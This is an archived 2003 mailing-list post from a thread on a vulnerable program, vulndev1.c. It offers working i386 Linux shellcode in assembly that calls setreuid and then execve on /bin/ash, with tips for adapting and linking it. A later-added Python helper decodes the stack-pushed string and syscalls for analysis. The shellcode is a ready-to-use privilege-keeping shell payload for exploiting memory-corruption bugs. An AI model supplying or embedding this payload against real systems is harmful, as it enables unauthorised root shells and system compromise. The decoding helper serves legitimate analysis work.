i haven't been really following the thread too much; although i did take a look at the code (vulndev1.c), anyways if someone is having a problem w/ shellcode here is the asm for a generic sys_setreuid/execve shellcode that's on the smaller side.

.section .text
.global _s
_s:
        xorl    %ebx, %ebx
        xorl    %ecx, %ecx
        movb    $0x46, %al              # sys_setreuid
        int     $0x80
        xorl    %eax, %eax
        pushl   %eax
        pushl   $0x6873612f             # hsa/
        pushl   $0x6e69622f             # nib/
        movl    %esp, %ebx
        pushl   %eax
        pushl   %ebx
        movl    %esp, %ecx
        xorl    %edx, %edx
        movb    $0xb, %al               # sys_execve
        int     $0x80

ah this calls /bin/ash if you don't have it, change the string and make sure to pass the -e flag to ld. it's small, it comes out to like 20+b or similar, i can't remember.

if i misread a post, well ignore me

"Once set in motion, the process of questioning could come to but one end, the erosion of conviction and certitude and collapse into despair" (The Specter of the Absurd, 1988).
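
Added example, not part of the original post: an analyst-side triage helper that reads the listing above and recovers the string built on the stack by the `pushl $imm32` pairs (which is why the post's comments read "hsa/" and "nib/" backwards), plus the syscalls selected through %al. The function names and the two-entry syscall table are assumptions made for this example; the listing is copied from the post with its comments stripped.

```python
import re
import struct
# Listing from the post, embedded as sample input (comments stripped).
LISTING = """
xorl %ebx, %ebx
xorl %ecx, %ecx
movb $0x46, %al
int $0x80
xorl %eax, %eax
pushl %eax
pushl $0x6873612f
pushl $0x6e69622f
movl %esp, %ebx
pushl %eax
pushl %ebx
movl %esp, %ecx
xorl %edx, %edx
movb $0xb, %al
int $0x80
"""
# Only the two i386 Linux syscall numbers the post names.
SYSCALLS = {0x46: "sys_setreuid", 0x0B: "sys_execve"}
PUSH_IMM = re.compile(r"pushl\s+\$(0x[0-9a-fA-F]+)")
MOV_AL = re.compile(r"movb\s+\$(0x[0-9a-fA-F]+),\s*%al")

def stack_strings(listing):
    """Rebuild strings assembled by consecutive `pushl $imm32` runs."""
    found, run = [], []
    for line in listing.splitlines() + [""]:
        m = PUSH_IMM.search(line)
        if m:
            run.append(int(m.group(1), 16))
        elif run:
            # Last push sits at the lowest address; dwords are little-endian.
            raw = b"".join(struct.pack("<I", v) for v in reversed(run))
            found.append(raw.decode("ascii", "replace"))
            run = []
    return found

def syscalls(listing):
    """Pair each `int $0x80` with the last value loaded into %al."""
    calls, al = [], None
    for line in listing.splitlines():
        m = MOV_AL.search(line)
        if m:
            al = int(m.group(1), 16)
        elif "int $0x80" in line and al is not None:
            calls.append(SYSCALLS.get(al, hex(al)))
    return calls
```
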
This archive was generated by hypermail 2b30 : Fri May 23 2003 - 09:23:18 PDT